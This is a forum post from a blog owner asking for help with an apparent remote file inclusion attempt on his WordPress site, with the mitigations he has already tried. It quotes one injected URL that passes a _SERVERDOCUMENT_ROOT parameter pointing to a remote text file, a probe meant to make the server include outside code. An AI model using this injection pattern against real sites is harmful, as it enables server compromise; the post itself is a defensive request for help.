Possible RFI hacking attempt?

  • aznbbj

    (@aznbbj)


    16 years, 10 months ago

    Long post below, but my thanks in advance for taking the time to read this. My blog was recently hacked and I have been struggling for a week to figure out how it was done. Here’s my blog:

    http://theawesomer.com

    The hack manifests itself if you click on the page numbers at the bottom of the page. E.g., the links have been changed from:

    http://theawesomer.com/page/2/

    to:

    http://theawesomer.com/page/2/?_SERVERDOCUMENT_ROOT=http%3A%2F%2Fwww.peb.com.ua%2Fua%2Freadme.txt%3F%3F%3F

    Several notes:
    1. The hack doesn’t seem to do anything, and may have been a failed attempt. It doesn’t actually redirect or launch any application.
    2. The file it’s trying to access is http://www.peb.com.ua/ua/readme.txt. I’m not much of a developer so I have no idea what it’s trying to do.
    3. These modified links are seen on the site itself, not just server logs and traffic statistics. I’ve seen them myself, as have several colleagues and concerned visitors.
    4. The modified links are transient. I have personally seen the hacked links there one minute, gone the next–despite having done nothing on my end. The majority of visitors never see these hacked links.

    I am a total neophyte to hacking, but after some googling I think I narrowed it down to an RFI (remote file inclusion) hack. I followed the instructions here:

    http://blogingenuity.com/2009/05/14/remote-file-inclusion-rfi-attempts-detecting-tracking-and-mitigating/#more-369

    … and turned Off register_globals, allow_url_fopen, and allow_url_include. They were all set to On previously.

    I also:
    1. Upgraded WordPress from 2.6. to 2.8.1 (and now 2.8.2 with the XSS fix)
    2. Upgraded all plugins
    3. Set .htaccess to block libwww-perl and prevent query strings with “http” in them
    4. Set Super Cache to stop cacheing /page/.

    I paid special attention to my pagination plugin, since that’s where the hack manifests itself. I was previously using Lester Chan’s WP-pagenavi which I upgraded along with WordPress. The result — no change. So, I tried another pagination plugin, WP Page Numbers — still no change.

    By far the most effective measure has been setting Super Cache to stop caching /page/, but this has not stopped the hacks completely.

    I still see them in my Apache logs. The IPs seem to be legitimate traffic (normal visitors), proven by the fact that I and my friends have seen the same hacked links on our computers. Shouldn’t an RFI attack originate remotely? Why has it been able to actually modify my links?

    I’ve even downloaded a complete copy of all files in my public_html directory (including all WordPress files) and exported my MySQL database to search for any trace of the hack — “peb.com.ua” or “DOCUMENT_ROOT” — and it’s just not there.

    So, I guess my questions are these: What exactly is happening to my site, and how do I keep it from happening again?

    Thank you!

The topic ‘Possible RFI hacking attempt?’ is closed to new replies.